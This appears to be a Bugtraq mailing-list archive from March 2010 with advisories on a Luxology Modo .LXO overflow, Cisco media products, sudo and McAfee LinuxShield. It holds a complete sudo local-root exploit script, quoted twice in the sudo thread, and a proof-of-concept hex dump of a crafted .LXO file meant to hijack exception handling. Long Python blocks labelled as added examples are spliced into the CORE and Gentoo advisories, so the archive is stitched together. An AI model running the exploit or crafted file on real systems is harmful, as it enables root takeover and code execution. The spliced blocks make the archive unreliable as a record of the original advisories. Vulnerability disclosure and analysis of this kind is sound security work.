CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow

2010-03-03 Thread CORE Security Technologies Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- Timeline corrected.

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Luxology Modo 401 .LXO Integer Overflow



1. *Advisory Information*

Title: Luxology Modo 401 .LXO Integer Overflow
Advisory Id: CORE-2009-0913
Advisory URL:
http://www.coresecurity.com/content/luxology-modo-lxo-vulnerability
Date published: 2010-03-02
Date of last update: 2010-03-02
Vendors contacted: Luxology LLC
Release mode: User release



2. *Vulnerability Information*

Class: Failure to Sanitize Data into a Different Plane [CWE-74]
Impact: Code execution
Remotely Exploitable: Yes (client side)
Locally Exploitable: No
Bugtraq ID: 38460
CVE Name: CVE-2010-0766



3. *Vulnerability Description*

Modo 401 [2] is an advanced polygon, subdivision surface, modeling,
sculpting, 3D painting, animation and rendering package developed by
Luxology LLC [3].
The function Swap4 in valet4.dll takes a length and an input buffer
and reverses the DWORDs in that buffer to correct their endianness.
In the case of the CHNL subchunk, an invalid length is passed to Swap4
unchecked, so the function reverses every DWORD on the stack, both
byte-swapping the SEH pointer near the bottom of the stack and raising
an exception that is then dispatched through the reversed pointer.
An attacker can take full control of the machine where Luxology Modo
401 is installed by sending a specially crafted .LXO file and enticing
the user to open it.


4. *Vulnerable packages*

   . Luxology Modo 401 - Windows
   . Older versions are probably affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*

The vendor did not provide fixes or workaround information.

To determine whether a .LXO file is suspicious, parse its chunk
structure, locate each CHNL subchunk and check that the declared length
fits inside the enclosing chunk before the file is opened in Modo.


6. *Credits*

This vulnerability was discovered and researched by Diego Juarez and
Nadia Rodriguez from Core Security Technologies during Bugweek 2009 [1].


7. *Technical Description / Proof of Concept Code*

The LXO file format is derived from the metaformat for binary files
described in "EA IFF 85 Standard for Interchange Format Files" [4] and
consists mainly of chunks and subchunks.
While parsing subchunks, the function Swap4 in valet4.dll takes a
length and an input buffer and reverses the DWORDs in that buffer to
correct their endianness.
In the case of the CHNL subchunk, an invalid length is passed to Swap4
unchecked, so it reverses every DWORD on the stack, both byte-swapping
the SEH pointer near the bottom of the stack and raising an exception
(that is, forcing a call through the now-reversed SEH pointer).
We believe this condition may be exploitable in some scenarios, as long
as the address of the function __except_handler3 in kernel32.dll has a
least significant byte below 0x7F.
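As an added example (not CORE's code and not part of the advisory), the length check suggested in section 5 applied to the chunk layout just described: it walks the FORM header, the top-level chunks and the subchunks of SURF and ITEM, and reports any subchunk, CHNL included, whose declared length does not fit in its parent chunk, which is exactly the value that reaches Swap4 unchecked. The chunk and subchunk field widths follow EA IFF 85 / LWO2 and agree with the proof-of-concept hex dump in this section; the fixed header fields of SURF and ITEM and the sample file built by build_sample() are assumptions of the example, not documented Luxology format details.

```python
"""Added example, not CORE's code: a length checker for the IFF-style
chunk/subchunk layout of .LXO files.

Layout assumed (EA IFF 85 / LWO2, consistent with the advisory's hex dump):
  FORM <u32 BE size> LXOB        file header
  <ID4> <u32 BE size> <data>     top-level chunk, data padded to an even size
  <ID4> <u16 BE size> <data>     subchunk inside SURF or ITEM, padded likewise
  S0                             NUL-terminated string padded to an even length
The fields before the first subchunk of SURF (name S0, source S0) and ITEM
(type S0, name S0, u32 reference) are inferred from the dump: an assumption.
"""
import struct

def _name(four_cc):
    return four_cc.decode("latin-1")

def _skip_s0(data, pos):
    """Offset just past the S0 string at pos (ValueError if it has no NUL)."""
    end = data.index(b"\x00", pos) + 1
    return end + ((end - pos) & 1)          # odd-length strings carry one pad byte

def _item_header(data, pos):
    pos = _skip_s0(data, pos)               # item type, e.g. "polyRender"
    pos = _skip_s0(data, pos)               # item name
    return pos + 4                          # u32 reference id

def _surf_header(data, pos):
    pos = _skip_s0(data, pos)               # surface name
    return _skip_s0(data, pos)              # source surface name

SUBCHUNK_PARENTS = {b"ITEM": _item_header, b"SURF": _surf_header}

def _check_subchunks(blob, parent, pos, end):
    """Walk the subchunks in blob[pos:end]; report the first declared length
    that does not fit (the check a parser needs before calling Swap4)."""
    while pos + 6 <= end:
        sid = blob[pos:pos + 4]
        size = struct.unpack(">H", blob[pos + 4:pos + 6])[0]
        avail = end - (pos + 6)
        if size > avail:
            return [f"subchunk {_name(sid)} in {_name(parent)} at {pos:#x}: declared "
                    f"length {size} exceeds the {avail} bytes left in its chunk"]
        pos += 6 + size + (size & 1)
    if pos != end:
        return [f"{_name(parent)}: {end - pos} trailing bytes do not form a subchunk"]
    return []

def check_lxo(blob):
    """Return a list of findings; an empty list means every length fits."""
    if len(blob) < 12 or blob[:4] != b"FORM":
        return ["not an IFF FORM file"]
    findings = []
    form_size = struct.unpack(">I", blob[4:8])[0]
    if form_size + 8 > len(blob):
        findings.append(f"FORM size {form_size} exceeds the {len(blob) - 8} bytes after the header")
    if blob[8:12] != b"LXOB":
        findings.append(f"unexpected form type {_name(blob[8:12])}")
    end, pos = min(len(blob), form_size + 8), 12
    while pos + 8 <= end:
        cid = blob[pos:pos + 4]
        size = struct.unpack(">I", blob[pos + 4:pos + 8])[0]
        data_start, data_end = pos + 8, pos + 8 + size
        if data_end > end:
            findings.append(f"chunk {_name(cid)} at {pos:#x}: declared length {size} "
                            f"exceeds the {end - data_start} bytes left in the file")
            break
        header = SUBCHUNK_PARENTS.get(cid)
        if header is not None:
            try:
                sub_start = header(blob, data_start)
            except ValueError:              # unterminated string: treat as overrun
                sub_start = end + 1
            if sub_start > data_end:
                findings.append(f"chunk {_name(cid)} at {pos:#x}: header runs past the chunk")
            else:
                findings += _check_subchunks(blob, cid, sub_start, data_end)
        pos = data_end + (size & 1)
    return findings

# --- constructed sample files (not the advisory's proof of concept) ---------
def _s0(text):
    raw = text.encode("ascii") + b"\x00"
    return raw + (b"\x00" if len(raw) & 1 else b"")

def _sub(sid, payload, declared=None):
    """Subchunk; `declared` lets a sample lie about its length."""
    size = len(payload) if declared is None else declared
    return sid + struct.pack(">H", size) + payload + (b"\x00" if len(payload) & 1 else b"")

def _chunk(cid, payload):
    return cid + struct.pack(">I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")

def build_sample(chnl_declared=None):
    """Minimal LXO-like file; chnl_declared overrides the CHNL length field."""
    chnl = _sub(b"CHNL", _s0("diffAmt") + struct.pack(">If", 0, 0.8), chnl_declared)
    link = _sub(b"LINK", _s0("parent") + struct.pack(">II", 3, 0))
    item = _chunk(b"ITEM", _s0("polyRender") + _s0("") + struct.pack(">I", 3) + link + chnl)
    surf = _chunk(b"SURF", _s0("Default") + _s0("")
                  + _sub(b"COLR", struct.pack(">fffH", 0.78, 0.78, 0.78, 0)))
    body = b"LXOB" + _chunk(b"TAGS", _s0("Default")) + surf + item
    return b"FORM" + struct.pack(">I", len(body)) + body

if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            problems = check_lxo(fh.read())
        print(path + ":", "OK" if not problems else "SUSPICIOUS")
        for p in problems:
            print("   ", p)
```

Run it as `python check_lxo.py file.lxo`; a file is reported as SUSPICIOUS as soon as one declared length overruns its container, so a CHNL subchunk whose 16-bit length exceeds the bytes left in its ITEM chunk is caught before any byte-swapping routine would walk past the buffer.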

Proof of concept: the following 464-byte LXO file demonstrates the
issue.

0000:  46 4F 52 4D-00 00 01 C4-4C 58 4F 42-54 41 47 53  FORM....LXOBTAGS
0010:  00 00 00 08-44 65 66 61-75 6C 74 00-4C 41 59 52  ....Default.LAYR
0020:  00 00 00 1A-00 00 00 00-00 00 00 00-00 00 00 00  ................
0030:  00 00 00 00-6C 61 79 65-72 6E 61 6D-65 00 50 4E  ....layername.PN
0040:  54 53 00 00-00 60 BF 00-00 00 BF 00-00 00 BF 00  TS...`..........
0050:  00 00 3F 00-00 00 BF 00-00 00 BF 00-00 00 3F 00  ..?...........?.
0060:  00 00 BF 00-00 00 3F 00-00 00 BF 00-00 00 BF 00  ......?.........
0070:  00 00 3F 00-00 00 BF 00-00 00 3F 00-00 00 BF 00  ..?.......?.....
0080:  00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00  ..?...?.......?.
0090:  00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00  ..?...?.......?.
00A0:  00 00 3F 00-00 00 42 42-4F 58 00 00-00 18 BF 00  ..?...BBOX......
00B0:  00 00 BF 00-00 00 BF 00-00 00 3F 00-00 00 3F 00  ..........?...?.
00C0:  00 00 3F 00-00 00 50 4F-4C 53 00 00-00 40 46 41  ..?...POLS...@FA
00D0:  43 45 00 04-00 00 00 01-00 02 00 03-00 04 00 00  CE..............
00E0:  00 04 00 05-00 01 00 04-00 01 00 05-00 06 00 02  ................
00F0:  00 04 00 03-00 02 00 06-00 07 00 04-00 00 00 03  ................
0100:  00 07 00 04-00 04 00 04-00 07 00 06-00 05 50 54  ..............PT
0110:  41 47 00 00-00 1C 53 55-52 46 00 00-00 00 00 01  AG....SURF......
0120:  00 00 00 02-00 00 00 03-00 00 00 04-00 00 00 05  ................
0130:  00 00 53 55-52 46 00 00-00 2A 44 65-66 61 75 6C  ..SURF...*Defaul
0140:  74 00 00 00-43 4F 4C 52-00 0E 3F 48-C8 8A 3F 48  t...COLR..?H..?H
0150:  C8 8A 3F 48-C8 8A 00 00-44 49 46 46-00 06 3F 80  ..?H....DIFF..?.
0160:  00 00 00 00-49 54 45 4D-00 00 00 64-70 6F 6C 79  ....ITEM...dpoly
0170:  52 65 6E 64-65 72 00 06-00 00 00 00-00 03 4C 49  Render........LI
0180:  4E 4B 00 10-70 61 72 65-6E 74 00 00-00 00 00 03  NK..parent......
0190:  00 00 00 00-43 48 4E 56-00 22 61 6D-62 43 6F 6C  ....CHNV."ambCol
01A0:  6F 72 00 00-00 02 00 00-00 03 52 00-40 00 00 00  or........R.@...

Re: Todd Miller Sudo local root exploit discovered by Slouching

2010-03-03 Thread Jann Horn
On Wednesday, 03.03.2010, 12:03 +, a...@hotmail.com wrote:
> Hi Kingcope,
> 
> but if the 'sudoers' file is correctly configured then you would not
> have the appropriate sudo permission to run the 'sudoedit' as root.
> 
> of course I'm assuming that the 'sudoers' file has not got the 'run
> any command' in it.
> 
> If the sudoers file used is even the default then I would think you would
> get some error on the lines of:
> 
> 'Sorry, user is not allowed to execute './sudoedit test' as root on this
> machine'.
> 
> Aren't you assuming that the sudoers file has a line in it that allows the
> user in question to run the /home/myhome/sudoedit as sudo???
> 
> Or am I missing something?
> 
> Andy

He's talking about a bug in sudo that allows him to run anything named
"sudoedit" if he can run commands that are in an alias named "sudoedit"
in /etc/sudoers.

Jann Horn



Cisco Security Advisory: Cisco Digital Media Player Remote Display Unauthorized Content Injection Vulnerability

2010-03-03 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Digital Media Player Remote Display
Unauthorized Content Injection Vulnerability

Advisory ID: cisco-sa-20100303-dmp

http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml

Revision 1.0

For Public Release 2010 March 03 1600 UTC (GMT)

+-

Summary
===

A vulnerability exists in the Cisco Digital Media Player that could
allow an unauthenticated attacker to inject video or data content into a
remote display.

Cisco has released free software updates that address this
vulnerability. There are no workarounds available to mitigate this
vulnerability.

This additional advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml.

Note: This advisory is being released simultaneously with
a multiple vulnerability disclosure advisory that impacts
the Cisco Digital Media Manager. This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml.

Affected Products
=

Vulnerable Products
+--

Cisco Digital Media Player versions earlier than 5.2 are affected by
this vulnerability.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

Cisco Digital Media Players are IP-based endpoints that can play
high-definition live and on-demand video, motion graphics, web pages,
and dynamic content on digital displays. The Cisco Digital Media Player
contains a vulnerability that could allow an unauthenticated attacker to
inject video or data content into a remote display.

This vulnerability is documented in Cisco Bug ID CSCtc46024 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0573.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

* CSCtc46024 ("Remote Display Unauthorized Content Injection")

CVSS Base Score - 8.5
    Access Vector -            Network
    Access Complexity -        Low
    Authentication -           None
    Confidentiality Impact -   None
    Integrity Impact -         Partial
    Availability Impact -      Complete

CVSS Temporal Score - 7.0
    Exploitability -           Functional
    Remediation Level -        Official-Fix
    Report Confidence -        Confirmed


Impact
==

Successful exploitation of the vulnerability could allow an
unauthenticated attacker to inject video or data content into a remote
display.

Software Versions and Fixes
===

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.

This vulnerability has been fixed in Cisco Digital Media Player version
5.2.

Workarounds
===

There are no workarounds to mitigate this vulnerability.

Obtaining Fixed Software


Cisco has released free software updates that address this
vulnerability. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.

Do not contact ps...@cisco.com or security-al...@cisco.com for
software upgrades.

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Digital Media Manager

2010-03-03 Thread Cisco Systems Product Security Incident Response Team
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Digital
Media Manager

Advisory ID: cisco-sa-20100303-dmm

http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml

Revision 1.0

For Public Release 2010 March 03 1600 UTC (GMT)

+-

Summary
===

Multiple vulnerabilities exist in the Cisco Digital Media Manager
(DMM). This security advisory outlines details of the following
vulnerabilities:

  * Default credentials
  * Privilege escalation vulnerability
  * Information leakage vulnerability

These vulnerabilities are independent of each other.

There are no workarounds that can mitigate any of these vulnerabilities.

This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmm.shtml.

Note: This advisory is being released simultaneously with
a vulnerability disclosure advisory that impacts the
Cisco Digital Media Player. This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20100303-dmp.shtml.

Affected Products
=

Vulnerable Products
+--

The following is a list of the products affected by each vulnerability
as described in detail within this advisory.

Default Credentials
+--

Cisco DMM versions 5.0.x and 5.1.x are affected by this vulnerability.
Cisco DMM versions 4.x are not vulnerable.

Privilege Escalation Vulnerability
+-

Cisco DMM versions 5.0.x and 5.1.x are affected by this vulnerability.
Cisco DMM versions 4.x are not vulnerable.

Information Leakage Vulnerability
+

All Cisco DMM releases earlier than 5.2 are affected by this
vulnerability.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
===

The Cisco DMM is used to manage, schedule, and publish digital media for
Cisco Digital Signs, Cisco Cast and Cisco Show and Share. This security
advisory describes multiple distinct vulnerabilities in the Cisco DMM.
These vulnerabilities are independent of each other.

Default Credentials
+--

Cisco DMM versions earlier than 5.2 have default credentials that could
allow an attacker full control of the installed web applications,
including settings, status, and deployment.

This vulnerability is documented in Cisco Bug ID CSCta03378 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0570.

Privilege Escalation Vulnerability
+-

A vulnerability exists in Cisco DMM versions 5.0.x and 5.1.x that could
allow authenticated, but unauthorized users to change the configuration
and obtain full access of the device.

This vulnerability is documented in Cisco Bug ID CSCtc46008 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0571.

Information Leakage Vulnerability
+

The Cisco DMM can be used to manage the Cisco Digital Media Player.
The Cisco Digital Media Player is an IP-based endpoint that can play
high-definition live and on-demand video, motion graphics, web pages,
and dynamic content on digital displays.

A vulnerability exists in all Cisco DMM versions earlier than 5.2 that
could allow authenticated but unauthorized users to view Cisco Digital
Media Player user credentials and LDAP credentials (if configured) in
error log messages and stack traces.

This vulnerability is documented in Cisco Bug ID CSCtc46050 and has
been assigned Common Vulnerabilities and Exposures (CVE) identifier
CVE-2010-0572.

Vulnerability Scoring Details
=

Cisco has provided scores for the vulnerabilities in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss

* CSCta03378 ("Default password for Tomcat administration account")

CVSS Base Score - 10.0
    Access Vector -            Network
    Access Complexity -        Low
    Authentication -           None
    Confidentiality Impact -   Complete
    Integrity Impact -         Complete
    Availability Impact -      Complete

CVSS Temporal Score - 8.7
Expl

[ GLSA 201003-01 ] sudo: Privilege escalation

2010-03-03 Thread Alex Legler
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 201003-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: sudo: Privilege escalation
  Date: March 03, 2010
  Bugs: #306865
ID: 201003-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Two vulnerabilities in sudo might allow local users to escalate
privileges and execute arbitrary code with root privileges.

Background
==

sudo allows a system administrator to give users the ability to run
commands as other users.

Affected packages
=

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  app-admin/sudo            < 1.7.2_p4                  >= 1.7.2_p4

Description
===

Multiple vulnerabilities have been discovered in sudo:

* Glenn Waller and neonsignal reported that sudo does not properly
  handle access control of the "sudoedit" pseudo-command
  (CVE-2010-0426).

* Harald Koenig reported that sudo does not properly set
  supplementary groups when using the "runas_default" option
  (CVE-2010-0427).

Impact
==

A local attacker with privileges to use "sudoedit" or the privilege to
execute commands with the "runas_default" setting enabled could
leverage these vulnerabilities to execute arbitrary code with elevated
privileges.

Workaround
==

CVE-2010-0426: Revoke all "sudoedit" privileges, or use the full path
to sudoedit. CVE-2010-0427: Remove all occurrences of the
"runas_default" setting.

Resolution
==

All sudo users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.2_p4"
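The sudoedit matching bug and the workaround above, as an added example that is neither sudo's code nor Gentoo's: a model of how a path-less "sudoedit" entry in sudoers is matched before and after the CVE-2010-0426 fix, plus an audit that lists the bare sudoedit entries the workaround says to revoke or replace with a full path. The rule layout, user names and sudoers content are constructed for the example; the model follows the advisory and CVE descriptions (a name match against any executable called sudoedit, versus only sudo's own edit mode), not sudo's source, and it does not expand Cmnd_Alias references, it flags the alias definition itself.

```python
"""Added example, not sudo's source: model of the CVE-2010-0426 sudoedit
pseudo-command match, and a sudoers audit for the GLSA workaround."""
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    user: str
    command: str        # path as the user typed it, e.g. "/tmp/sudoedit"
    edit_mode: bool     # True when sudo itself was started as sudoedit / sudo -e


def command_matches(sudoers_cmnd, req, fixed):
    """Does one command from a sudoers rule authorise this request?"""
    if "/" not in sudoers_cmnd:
        # A path-less entry is a pseudo-command, and "sudoedit" is the only one.
        if sudoers_cmnd != "sudoedit":
            return False
        if fixed:
            # Fixed: only sudo's own edit mode satisfies the pseudo-command;
            # a file on disk never does, whatever it is called.
            return req.edit_mode
        # Vulnerable: the check compared names, so any executable whose
        # basename is "sudoedit" (for example /tmp/sudoedit) matched too.
        return os.path.basename(req.command) == "sudoedit"
    # Fully-qualified entries match the invoked path exactly.
    return not req.edit_mode and req.command == sudoers_cmnd


def is_permitted(rules, req, fixed):
    """rules: (user, (command, ...)) pairs; host and runas parts left out."""
    return any(user == req.user and any(command_matches(c, req, fixed) for c in cmds)
               for user, cmds in rules)


def audit_sudoers(text):
    """Return (line_no, entry) for every rule or Cmnd_Alias granting the
    bare sudoedit pseudo-command (the entries to revoke or give a full path)."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        body = line.split("#", 1)[0].strip()
        if "=" not in body or body.startswith("Defaults"):
            continue
        for entry in body.split("=", 1)[1].split(","):
            words = entry.split()
            if words and words[0].startswith("("):      # skip a (runas) list
                while words and not words.pop(0).endswith(")"):
                    pass
            words = [w for w in words if not w.endswith(":")]   # NOPASSWD: etc.
            if words and words[0] == "sudoedit":
                hits.append((no, entry.strip()))
    return hits


# Constructed sudoers content and rules for the demonstration.
SUDOERS = """\
Defaults    env_reset
Cmnd_Alias  EDIT = sudoedit /etc/hosts, /usr/bin/vim /etc/motd
alice       ALL = (root) sudoedit
bob         ALL = NOPASSWD: /usr/bin/sudoedit /etc/hosts
carol       ALL = EDIT
"""
RULES = (("alice", ("sudoedit",)),)
# The scenario from the thread: a script named sudoedit dropped in /tmp.
FAKE_SUDOEDIT = Request("alice", "/tmp/sudoedit", edit_mode=False)
REAL_SUDOEDIT = Request("alice", "sudoedit", edit_mode=True)

if __name__ == "__main__":
    for label, fixed in (("vulnerable", False), ("fixed", True)):
        print(f"{label}: /tmp/sudoedit -> {is_permitted(RULES, FAKE_SUDOEDIT, fixed)}, "
              f"real sudoedit -> {is_permitted(RULES, REAL_SUDOEDIT, fixed)}")
    for no, entry in audit_sudoers(SUDOERS):
        print(f"line {no}: bare sudoedit entry: {entry}")
```

The vulnerable branch lets the /tmp/sudoedit script through on the strength of its name alone, which is the whole exploit; the fixed branch keys on how sudo was invoked, so a file name can never satisfy a pseudo-command. Until the upgrade is in place, the audit output is the list of lines to change.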

References
==

  [ 1 ] CVE-2010-0426
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426
  [ 2 ] CVE-2010-0427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201003-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2010 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Re: Todd Miller Sudo local root exploit discovered by Slouching

2010-03-03 Thread Kingcope
Hello Andy,

I am referring to the following forum posts.

http://www.linuxquestions.org/questions/linux-security-4/the-use-of-sudoedit-command-question-785442/

/kcope

On Wednesday, 03.03.2010, 12:03 +, a...@hotmail.com wrote:
> Hi Kingcope,
> 
> but if the 'sudoers' file is correctly configured then you would not
> have the appropriate sudo permission to run the 'sudoedit' as root.
> 
> of course I'm assuming that the 'sudoers' file has not got the 'run
> any command' in it.
> 
> If the sudoers file used is even the default then I would think you would
> get some error on the lines of:
> 
> 'Sorry, user is not allowed to execute './sudoedit test' as root on this
> machine'.
> 
> Aren't you assuming that the sudoers file has a line in it that allows the
> user in question to run the /home/myhome/sudoedit as sudo???
> 
> Or am I missing something?
> 
> Andy
> 
> On Tue, 2 Mar 2010, Kingcope wrote:
> 
> > Just for the record.
> >
> > ---snip---
> > #!/bin/sh
> > # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> > # local root exploit
> > # March 2010
> > # automated by kingcope
> > # Full Credits to Slouching
> > echo Tod Miller Sudo local root exploit
> > echo by Slouching
> > echo automated by kingcope
> > if [ $# != 1 ]
> > then
> > echo "usage: ./sudoxpl.sh "
> > exit
> > fi
> > cd /tmp
> > cat > sudoedit << _EOF
> > #!/bin/sh
> > echo ALEX-ALEX
> > su
> > /bin/su
> > /usr/bin/su
> > _EOF
> > chmod a+x ./sudoedit
> > sudo ./sudoedit $1
> > --snip---
> >
> > cheers,
> > kingcope
> >
> 




Re: Todd Miller Sudo local root exploit discovered by Slouching

2010-03-03 Thread andy
Hi Kingcope,

but if the 'sudoers' file is correctly configured then you would not
have the appropriate sudo permission to run the 'sudoedit' as root.

of course I'm assuming that the 'sudoers' file has not got the 'run
any command' in it.

If the sudoers file used is even the default then I would think you would
get some error on the lines of:

'Sorry, user is not allowed to execute './sudoedit test' as root on this
machine'.

Aren't you assuming that the sudoers file has a line in it that allows the
user in question to run the /home/myhome/sudoedit as sudo???

Or am I missing something?

Andy

On Tue, 2 Mar 2010, Kingcope wrote:

> Just for the record.
>
> ---snip---
> #!/bin/sh
> # Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
> # local root exploit
> # March 2010
> # automated by kingcope
> # Full Credits to Slouching
> echo Tod Miller Sudo local root exploit
> echo by Slouching
> echo automated by kingcope
> if [ $# != 1 ]
> then
> echo "usage: ./sudoxpl.sh "
> exit
> fi
> cd /tmp
> cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
> chmod a+x ./sudoedit
> sudo ./sudoedit $1
> --snip---
>
> cheers,
> kingcope
>



Re: NSOADV-2010-004: McAfee LinuxShield remote/local code execution

2010-03-03 Thread NSO Research
ACK! You can find users who can log in to the web interface with this trick.


On 03.03.2010 09:14, Veal, Richard wrote:
> 
> I believe there could also be a remote user enumeration using this
> service - when attempting to log into the web interface using a
> non-valid username / any password you get "Error: bad credentials" but
> when attempting to log with a valid username / invalid password you seem
> to get: 
> 
> "Error: bad credentials
> Error Information
> Error Code    Description
> 34            authentication failure"
> 
> Version 1.5.1, anyone confirm? Has this been mentioned before?
> 
> 
> Rich
> 
> 
> 
> -Original Message-
> From: NSO Research [mailto:nso-resea...@sotiriu.de] 
> Sent: 02 March 2010 21:30
> To: bugtraq@securityfocus.com
> Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> 
> __
> 
> NSOADV-2010-004: McAfee LinuxShield remote/local code execution
> __
> __
> 
> __
> __
> 
>   Title:  McAfee LinuxShield remote/local code
>   execution
>   Severity:   Medium
>   Advisory ID:NSOADV-2010-004
>   Found Date: 07.12.2009
>   Date Reported:  05.02.2010
>   Release Date:   02.03.2010
>   Author: Nikolas Sotiriu (lofi)
>   Website:http://sotiriu.de
>   Twitter:http://twitter.com/nsoresearch
>   Mail:   nso-research at sotiriu.de
>   URL:http://sotiriu.de/adv/NSOADV-2010-004.txt
>   Vendor: McAfee (http://www.mcafee.com/)
>   Affected Products:  McAfee LinuxShield <= 1.5.1
>   Not Affected Products:  McAfee LinuxShield 1.5.1 with HF550192
>   Remote Exploitable: Yes (attacker must be authenticated)
>   Local Exploitable:  Yes
>   Patch Status:   Vendor released a patch (See Solution)
>   Discovered by:  Nikolas Sotiriu
>   Thanks to:  Thierry Zoller: For the permission to use his
>   Policy
> 
> 
> Background:
> ===
> 
> LinuxShield detects and removes viruses and other potentially unwanted
> software on Linux-based systems. LinuxShield uses the powerful McAfee
> scanning engine - the engine common to all our anti-virus products.
> 
> Although a few years ago, the Linux operating system was considered a
> secure environment, it is now seeing more occurrences of software
> specifically written to attack or exploit security weaknesses in
> Linux-based systems. Increasingly, Linux-based systems interact with
> Windows-based computers. Although viruses written to attack Windows-
> based systems do not directly attack Linux systems, a Linux server can
> harbor these viruses, ready to infect any client that connects to it.
> 
> When installed on your Linux systems, LinuxShield provides protection
> against viruses, Trojan horses, and other types of potentially unwanted
> software.
> 
> LinuxShield scans files as they are opened and closed - a technique
> known as on-access scanning. LinuxShield also incorporates an on-demand
> scanner that enables you to scan any directory or file in your host a

RE: NSOADV-2010-004: McAfee LinuxShield remote/local code execution

2010-03-03 Thread Veal, Richard

I believe there could also be a remote user enumeration using this
service - when attempting to log into the web interface using a
non-valid username / any password you get "Error: bad credentials" but
when attempting to log with a valid username / invalid password you seem
to get: 

"Error: bad credentials
Error Information
Error Code  Description
34  authentication failure"

Version 1.5.1, anyone confirm? Has this been mentioned before?


Rich



-Original Message-
From: NSO Research [mailto:nso-resea...@sotiriu.de] 
Sent: 02 March 2010 21:30
To: bugtraq@securityfocus.com
Subject: NSOADV-2010-004: McAfee LinuxShield remote/local code execution

__

NSOADV-2010-004: McAfee LinuxShield remote/local code execution
__
__

__
__

  Title:  McAfee LinuxShield remote/local code
  execution
  Severity:   Medium
  Advisory ID:NSOADV-2010-004
  Found Date: 07.12.2009
  Date Reported:  05.02.2010
  Release Date:   02.03.2010
  Author: Nikolas Sotiriu (lofi)
